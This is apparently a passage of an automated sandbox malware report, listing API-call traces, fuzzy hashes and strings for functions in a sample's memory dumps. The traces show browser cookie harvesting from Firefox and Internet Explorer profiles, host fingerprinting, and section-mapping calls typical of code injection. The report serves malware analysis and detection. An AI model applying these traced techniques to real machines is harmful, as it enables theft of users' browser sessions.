    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CD519, Relevance: 21.3, APIs: 14, Instructions: 266 Total matches: 1memorylibrarynative
Similarity
  • Total matches: 1
  • API ID: GetLastErrorRtlAllocateHeap$CloseHandle$CreateMutexLoadLibraryNtQueryInformationProcessOpenProcessmemsetwsprintf
  • String ID:
  • API String ID: 2923459890-0
  • Opcode ID: fd4dac6fec6db53c5973630ed042fd72ea6fdc6dc32fc90b99fe3bec89cdeab6
  • Instruction ID: 26bfd73ccc71b3223ffb0c1a9f99629be3cba527ef27f26009e6f75bafa4995c
  • Opcode Fuzzy Hash: 2931CEB24D0A104BA11F6050C8A877FAB0BF7817E5DDC5B17FE007448D6F4BA9E06B6A
  • Instruction Fuzzy Hash: 26bfd73ccc71b3223ffb0c1a9f99629be3cba527ef27f26009e6f75bafa4995c
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001CD561
  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
  • CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001D813C: GetVersion.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001D8187
    • Part of subcall function 001D813C: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001D81B4
    • Part of subcall function 001CB7D1: RtlAllocateHeap.NTDLL(00000000,-00000003,00000000), ref: 001CB7EB
    • Part of subcall function 001CB7D1: RtlAllocateHeap.NTDLL(00000000,00000838,001E5124), ref: 001DA8C6
    • Part of subcall function 001CB7D1: RtlInitializeCriticalSection.NTDLL(00000000), ref: 001DA8D3
    • Part of subcall function 001CB7D1: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001DA91A
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
  • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
  • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
  • CloseHandle.KERNEL32(00000000), ref: 001CD689
  • RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001DC938: memcpy.NTDLL(001EB114,?,00000018,001CD6EA,?,00000000,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001DC94A
    • Part of subcall function 001CD47D: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,001CD6F9,001EB0D4,?,?,00000000,001CD6F9), ref: 001CD4B1
    • Part of subcall function 001CD47D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CD511
    • Part of subcall function 001CB410: GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001CB410: GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
    • Part of subcall function 001CB410: CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
    • Part of subcall function 001CB410: CloseHandle.KERNEL32(00000000), ref: 001CB490
    • Part of subcall function 001CB410: GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C3D4D: RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001C3D4D: RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
    • Part of subcall function 001C3D4D: wsprintfA.USER32 ref: 001C3E55
  • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
  • LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CBEAE: CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
    • Part of subcall function 001CBEAE: CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
    • Part of subcall function 001CBEAE: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
    • Part of subcall function 001CBEAE: CloseHandle.KERNEL32(00000000), ref: 001CBF09
    • Part of subcall function 001CBEAE: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
  • wsprintfA.USER32 ref: 001CD849
    • Part of subcall function 001CD0AE: StrChrA.SHLWAPI(?,00000020), ref: 001CD11E
    • Part of subcall function 001CD0AE: HeapFree.KERNEL32(00000000,?,00000125), ref: 001CD166
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
